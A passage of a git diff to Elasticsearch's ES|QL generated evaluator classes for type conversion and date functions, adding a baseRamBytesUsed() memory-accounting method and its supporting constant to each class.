b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromIntEvaluator.java index 998b421d4ae93..c57e1c1c4c8a2 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToUnsignedLongFromIntEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToUnsignedLongFromIntEvaluator.class); + private final EvalOperator.ExpressionEvaluator i; public ToUnsignedLongFromIntEvaluator(Source source, EvalOperator.ExpressionEvaluator i, @@ -114,6 +117,13 @@ public void close() { Releasables.closeExpectNoException(i); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += i.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromLongEvaluator.java index 5ee30aa71f28a..e4052e6845937 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToUnsignedLongFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToUnsignedLongFromLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator lng; public ToUnsignedLongFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator lng, @@ -113,6 +116,13 @@ public void close() { Releasables.closeExpectNoException(lng); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lng.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromStringEvaluator.java index a1422cf096d83..70c95cf78bc58 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromStringEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToUnsignedLongFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToUnsignedLongFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToUnsignedLongFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToVersionFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToVersionFromStringEvaluator.java index 77afbffb7f491..b6a9373d6b136 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToVersionFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToVersionFromStringEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToVersionFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToVersionFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator asString; public ToVersionFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator asString, @@ -120,6 +123,13 @@ public void close() { Releasables.closeExpectNoException(asString); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += asString.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisEvaluator.java index eee8c756930ab..b8d7f37bc4e8a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateDiffConstantMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffConstantMillisEvaluator.class); + private final Source source; private final DateDiff.Part datePartFieldUnit; @@ -63,6 +66,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += startTimestamp.baseRamBytesUsed(); + baseRamBytesUsed += endTimestamp.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, LongBlock startTimestampBlock, LongBlock endTimestampBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisNanosEvaluator.java index 5a0a6051abebb..3ef1b52fd4643 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateDiffConstantMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffConstantMillisNanosEvaluator.class); + private final Source source; private final DateDiff.Part datePartFieldUnit; @@ -63,6 +66,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += startTimestampMillis.baseRamBytesUsed(); + baseRamBytesUsed += endTimestampNanos.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, LongBlock startTimestampMillisBlock, LongBlock endTimestampNanosBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosEvaluator.java index dc28b97fef9aa..2b651148eb0b8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateDiffConstantNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffConstantNanosEvaluator.class); + private final Source source; private final DateDiff.Part datePartFieldUnit; @@ -63,6 +66,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += startTimestamp.baseRamBytesUsed(); + baseRamBytesUsed += endTimestamp.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, LongBlock startTimestampBlock, LongBlock endTimestampBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosMillisEvaluator.java index 477fb22548d2e..17987114f85be 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateDiffConstantNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffConstantNanosMillisEvaluator.class); + private final Source source; private final DateDiff.Part datePartFieldUnit; @@ -63,6 +66,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += startTimestampNanos.baseRamBytesUsed(); + baseRamBytesUsed += endTimestampMillis.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, LongBlock startTimestampNanosBlock, LongBlock endTimestampMillisBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisEvaluator.java index bf938f135b6fa..ad458e5bd92ed 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateDiffMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator unit; @@ -72,6 +75,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += unit.baseRamBytesUsed(); + baseRamBytesUsed += startTimestamp.baseRamBytesUsed(); + baseRamBytesUsed += endTimestamp.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock unitBlock, LongBlock startTimestampBlock, LongBlock endTimestampBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisNanosEvaluator.java index 2e4f71d8636b4..d1c37cddd3810 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisNanosEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateDiffMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator unit; @@ -72,6 +75,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += unit.baseRamBytesUsed(); + baseRamBytesUsed += startTimestampMillis.baseRamBytesUsed(); + baseRamBytesUsed += endTimestampNanos.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock unitBlock, LongBlock startTimestampMillisBlock, LongBlock endTimestampNanosBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosEvaluator.java index 1fb8e2c744cd3..87dd22863c1cb 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateDiffNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator unit; @@ -72,6 +75,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += unit.baseRamBytesUsed(); + baseRamBytesUsed += startTimestamp.baseRamBytesUsed(); + baseRamBytesUsed += endTimestamp.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock unitBlock, LongBlock startTimestampBlock, LongBlock endTimestampBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosMillisEvaluator.java index f08424a09d1b4..d641996c4128e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosMillisEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateDiffNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator unit; @@ -72,6 +75,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += unit.baseRamBytesUsed(); + baseRamBytesUsed += startTimestampNanos.baseRamBytesUsed(); + baseRamBytesUsed += endTimestampMillis.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock unitBlock, LongBlock startTimestampNanosBlock, LongBlock endTimestampMillisBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantMillisEvaluator.java index fe283a95f3c2e..64ba4c666c77a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantMillisEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.time.ZoneId; import java.time.temporal.ChronoField; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateExtractConstantMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateExtractConstantMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator value; @@ -56,6 +59,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += value.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock valueBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantNanosEvaluator.java index 35bca67388d78..51e97f41af550 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantNanosEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.time.ZoneId; import java.time.temporal.ChronoField; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateExtractConstantNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateExtractConstantNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator value; @@ -56,6 +59,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += value.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock valueBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractMillisEvaluator.java index dcb8a543f5c35..eb48145360f95 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractMillisEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.time.ZoneId; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateExtractMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateExtractMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator value; @@ -64,6 +67,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += value.baseRamBytesUsed(); + baseRamBytesUsed += chronoField.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock valueBlock, BytesRefBlock chronoFieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { BytesRef chronoFieldScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractNanosEvaluator.java index 6b961447df830..ab14429375599 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractNanosEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.time.ZoneId; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateExtractNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateExtractNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator value; @@ -64,6 +67,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += value.baseRamBytesUsed(); + baseRamBytesUsed += chronoField.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock valueBlock, BytesRefBlock chronoFieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { BytesRef chronoFieldScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisConstantEvaluator.java index 77aa06913c565..dd672f98aae47 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisConstantEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.time.DateFormatter; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateFormatMillisConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateFormatMillisConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, LongBlock valBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisEvaluator.java index 428b932df3978..ea91a79961fb3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.Locale; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateFormatMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateFormatMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -64,6 +67,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + 